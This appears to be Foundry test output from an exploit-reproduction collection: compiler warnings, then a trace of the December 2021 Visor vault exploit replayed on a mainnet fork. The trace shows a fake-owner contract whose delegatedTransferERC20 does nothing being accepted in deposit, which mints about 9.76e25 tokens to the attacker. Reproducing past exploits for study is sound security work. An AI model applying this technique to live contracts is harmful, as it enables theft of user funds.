Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.27s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to view
  --> src/test/2021-12/Visor_exp.sol:23:5:
   |
23 |     function owner() external returns (address) {
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.17s (3.72ms CPU time)

Ran 1 test for src/test/2021-12/Visor_exp.sol:ContractTest
[PASS] testExploit() (gas: 137151)
Logs:
  Attacker VIST Balance: 97624975481815716136709737

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 13849006 [1.384e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [137151] ContractTest::testExploit()
    ├─ [125695] 0xC9f27A50f82571C1C8423A42970613b8dBDA14ef::deposit(100000000000000000000000000 [1e26], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38])
    │   ├─ [2344] 0x3a84aD5d16aDBE566BAA6b3DafE39Db3D5E261E5::totalSupply() [staticcall]
    │   │   └─ ← [Return] 9000242001852185487035933 [9e24]
    │   ├─ [2519] 0xF938424F7210f31dF2Aee3011291b658f872e91e::balanceOf(0xC9f27A50f82571C1C8423A42970613b8dBDA14ef) [staticcall]
    │   │   └─ ← [Return] 9219200268612237484049971 [9.219e24]
    │   ├─ [344] 0x3a84aD5d16aDBE566BAA6b3DafE39Db3D5E261E5::totalSupply() [staticcall]
    │   │   └─ ← [Return] 9000242001852185487035933 [9e24]
    │   ├─ [402] ContractTest::owner()
    │   │   └─ ← [Return] ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]
    │   ├─ [924] ContractTest::delegatedTransferERC20(0xF938424F7210f31dF2Aee3011291b658f872e91e, 0xC9f27A50f82571C1C8423A42970613b8dBDA14ef, 100000000000000000000000000 [1e26])
    │   │   └─ ← [Stop]
    │   ├─ [106127] 0x3a84aD5d16aDBE566BAA6b3DafE39Db3D5E261E5::mint(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], 97624975481815716136709737 [9.762e25])
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], value: 97624975481815716136709737 [9.762e25])
    │   │   ├─  storage changes:
    │   │   │   @ 0x3e1a6e48cd7e8291e25c14adac8306b064f909d041e2dc71d7bda438c8681263: 0 → 0x00000000000000000000000000000000000000000050c0e4867acf6a7c636e69
    │   │   │   @ 0x23e01f0143f469be46548eb0718722e1e8e0fec1f6f64ea171ed70d29679ada0: 0 → 1
    │   │   │   @ 0x634786e7c4f9dbd8c0c285d2d66c8d27ae522c9563a9d6599ec2b1e95cdf5f97: 0 → 2
    │   │   │   @ 2: 0x0000000000000000000000000000000000000000000771e018b87ebc6f8b4e1d → 0x0000000000000000000000000000000000000000005832c49f334e26ebeebc86
    │   │   │   @ 0x23e01f0143f469be46548eb0718722e1e8e0fec1f6f64ea171ed70d29679ada1: 0 → 1
    │   │   └─ ← [Stop]
    │   └─ ← [Return] 97624975481815716136709737 [9.762e25]
    ├─ [543] 0x3a84aD5d16aDBE566BAA6b3DafE39Db3D5E261E5::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [staticcall]
    │   └─ ← [Return] 97624975481815716136709737 [9.762e25]
    ├─ emit log_named_uint(key: "Attacker VIST Balance", val: 97624975481815716136709737 [9.762e25])
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 9.77s (6.03s CPU time)

Ran 2 test suites in 9.79s (10.94s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
